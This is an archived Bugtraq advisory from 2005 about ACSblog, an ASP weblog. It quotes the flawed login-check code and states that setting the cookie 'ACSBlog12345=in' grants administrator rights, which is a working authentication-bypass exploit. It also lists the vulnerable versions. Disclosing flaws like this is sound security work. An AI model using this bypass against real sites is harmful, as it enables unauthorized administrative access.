[38549] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

ACSblog bug

daemon@ATHENA.MIT.EDU (farhad koosha)
Sat Apr 23 14:49:17 2005

Date: 23 Apr 2005 17:10:21 -0000
Message-ID: <20050423171021.17464.qmail@www.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: farhad koosha <farhadkey@yahoo.com>
To: bugtraq@securityfocus.com



*/ WWW.BAHADORLOVER.COM \*

ACSblog :
A asp weblog with manageable code blocks and logical structure make it easy for the novice to get into the code and customize it to your site. Full-featured enough for expert bloggers

vendor:www.asppress.com

Where is the bug ?

inc_login_check.asp 

<% if request.cookies(cookiename)="in" then
ihaveadminright=true
else
ihaveadminright=false
end if
%>

---------------

Default cookiename is "ACSBlog12345" and you can create a cookie or using http headers -> ACSBlog12345=in

---------------

vulnerable versions:
0.8
1.0
1.0.1
1.0.2
1.0.3
1.1
1.1.2
1.1.3
Commercial Version

3NITRO : www.bahadorlover.com


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[38549] in bugtraq

ACSblog bug

daemon@ATHENA.MIT.EDU (farhad koosha)Sat Apr 23 14:49:17 2005

daemon@ATHENA.MIT.EDU (farhad koosha)
Sat Apr 23 14:49:17 2005